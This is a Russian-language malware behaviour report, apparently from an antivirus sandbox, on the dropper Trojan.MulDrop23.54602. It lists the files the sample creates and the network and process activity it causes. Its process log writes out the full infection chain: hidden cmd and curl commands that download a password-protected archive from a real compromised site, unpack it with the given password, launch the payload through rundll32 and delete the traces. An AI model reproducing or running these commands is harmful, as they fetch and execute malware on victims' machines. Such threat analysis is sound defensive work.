Trojan.MulDrop23.54602

Техническая информация

Вредоносные функции

Создает и запускает на исполнение

'%TEMP%\quaerat.x' -p#4p2h@!eiNtKVN46 e -so "%TEMP%\repellat.k"

Внедряет код в

следующие системные процессы:

<SYSTEM32>\svchost.exe

Изменения в файловой системе

Создает следующие файлы

%TEMP%\content\4712-4716-wscript.exe-16-44-28-740.dump
%ALLUSERSPROFILE%\microsoft\windows\onesettings\ctac.json
%ALLUSERSPROFILE%\microsoft\windows\onesettings\directxdbversion.json
%TEMP%\aut.iipsa.m
%TEMP%\content\4712-4716-wscript.exe-16-45-31-328.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-32-218.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-22-868.dump
%ALLUSERSPROFILE%\microsoft\windows\onesettings\cortanauwp.json
%TEMP%\content\4712-4716-wscript.exe-16-45-32-221.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-43-234.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-43-236.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-45-530.dump
%ALLUSERSPROFILE%\microsoft\windows\onesettings\troubleshootingsvc.json
%ALLUSERSPROFILE%\microsoft\windows\models\modelpayload.json
%TEMP%\content\4712-4716-wscript.exe-16-45-32-811.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-32-969.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-22-867.dump
%ALLUSERSPROFILE%\microsoft\windows\onesettings\asap_cloudpolicy.json
%ALLUSERSPROFILE%\microsoft\windows\onesettings\config.json
%TEMP%\content\4712-4716-wscript.exe-16-44-28-880.dump
%TEMP%\content\4712-4716-wscript.exe-16-44-29-326.dump
%TEMP%\content\4712-4716-wscript.exe-16-44-32-095.dump
%TEMP%\aut.i.bat
%TEMP%\content\4712-4716-wscript.exe-16-44-42-513.dump
%TEMP%\content\4712-4716-wscript.exe-16-44-42-528.dump
%TEMP%\content\4712-4716-wscript.exe-16-44-28-863.dump
%TEMP%\repellat.k
%TEMP%\content\4712-4716-wscript.exe-16-45-09-072.dump
%TEMP%\content\4712-4716-wscript.exe-16-45-09-086.dump
<SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\notifications\wpndatabase.db-journal
<SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\notifications\wpndatabase.db
<SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\notifications\wpndatabase.db-wal
%TEMP%\quaerat.x
%TEMP%\content\4712-4716-wscript.exe-16-45-09-069.dump
%LOCALAPPDATA%\packages\microsoft.microsoftedge_8wekyb3d8bbwe\ac\#!001\microsoftedge\msimgsiz.dat
%LOCALAPPDATA%\packages\microsoft.microsoftedge_8wekyb3d8bbwe\ac\#!002\microsoftedge\msimgsiz.dat

Перемещает следующие файлы

%TEMP%\aut.iipsa.m в %TEMP%\aut.i

Подменяет следующие файлы

%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log
%ALLUSERSPROFILE%\Microsoft\Search\Data\Applications\Windows\edb.jtx
%ALLUSERSPROFILE%\Microsoft\Search\Data\Applications\Windows\edbtmp.jtx

Сетевая активность

Подключается к

'to###auty.ae':443
'7-##p.org':443
'x1.#.lencr.org':80
'r3.#.lencr.org':80

TCP

Запросы HTTP GET

http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB039D4329A5E8.crt?0d##############
http://x1.#.lencr.org/
http://r3.#.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgQw1yYz05vyRVBnlgKpQMNCUw%3D%3D

Другие

'to###auty.ae':443
'7-##p.org':443

UDP

DNS ASK to###auty.ae
DNS ASK 7-##p.org
DNS ASK x1.#.lencr.org
DNS ASK r3.#.lencr.org

Другое

Ищет следующие окна

ClassName: 'OleMainThreadWndClass' WindowName: ''
ClassName: '' WindowName: ''
ClassName: 'HelpPane' WindowName: ''

Создает и запускает на исполнение

'<SYSTEM32>\cmd.exe' /c del "<PATH_SAMPLE>.js"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c echo curl https://topbeauty.ae/wp-content/plugins/elementor/includes/widgets/traits/1136.7z --output "%TEMP%\repellat.k" --ssl-no-revoke --insecure --location > "%TEMP%\aut.i.bat"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "%TEMP%\aut.i.bat"' (со скрытым окном)
'<SYSTEM32>\curl.exe' https://www.7-zip.org/a/7zr.exe --output "%TEMP%\quaerat.x"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\quaerat.x" -p#4p2h@!eiNtKVN46 e -so "%TEMP%\repellat.k" > "%TEMP%\aut.iipsa.m""' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c del "%TEMP%\quaerat.x"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c del "%TEMP%\repellat.k"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ren "%TEMP%\aut.iipsa.m" "aut.i"' (со скрытым окном)
'<SYSTEM32>\rundll32.exe' "%TEMP%\aut.i", scab /k abebas531' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c del "%TEMP%\aut.i.bat"' (со скрытым окном)

Запускает на исполнение

'<SYSTEM32>\cmd.exe' /c del "<PATH_SAMPLE>.js"
'<SYSTEM32>\svchost.exe' -k wsappx -p
'<SYSTEM32>\microsoftedgecp.exe' -ServerName:Windows.Internal.WebRuntime.ContentProcessServer
'<SYSTEM32>\svchost.exe' -k wusvcs -p
'%WINDIR%\systemapps\microsoft.microsoftedge_8wekyb3d8bbwe\microsoftedge.exe' -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
'<SYSTEM32>\mitigationscanner.exe'
'%WINDIR%\winhlp32.exe' -x
'<SYSTEM32>\cmd.exe' /c del "%TEMP%\aut.i.bat"
'<SYSTEM32>\searchprotocolhost.exe' Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-2377844457-1847597103-2569463324-10003_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-2377844457-1847597103-2569463324-10003 1 -2147483646 "Software\Micr...
'<SYSTEM32>\rundll32.exe' "%TEMP%\aut.i", scab /k abebas531
'<SYSTEM32>\cmd.exe' /c del "%TEMP%\repellat.k"
'<SYSTEM32>\cmd.exe' /c del "%TEMP%\quaerat.x"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\quaerat.x" -p#4p2h@!eiNtKVN46 e -so "%TEMP%\repellat.k" > "%TEMP%\aut.iipsa.m""
'<SYSTEM32>\curl.exe' https://www.7-zip.org/a/7zr.exe --output "%TEMP%\quaerat.x"
'<SYSTEM32>\curl.exe' https://topbeauty.ae/wp-content/plugins/elementor/includes/widgets/traits/1136.7z --output "%TEMP%\repellat.k" --ssl-no-revoke --insecure --location
'<SYSTEM32>\cmd.exe' /c "%TEMP%\aut.i.bat"
'<SYSTEM32>\cmd.exe' /c echo curl https://topbeauty.ae/wp-content/plugins/elementor/includes/widgets/traits/1136.7z --output "%TEMP%\repellat.k" --ssl-no-revoke --insecure --location > "%TEMP%\aut.i.bat"
'<SYSTEM32>\cmd.exe' /c ren "%TEMP%\aut.iipsa.m" "aut.i"
'<SYSTEM32>\searchfilterhost.exe' 0 768 772 780 8192 776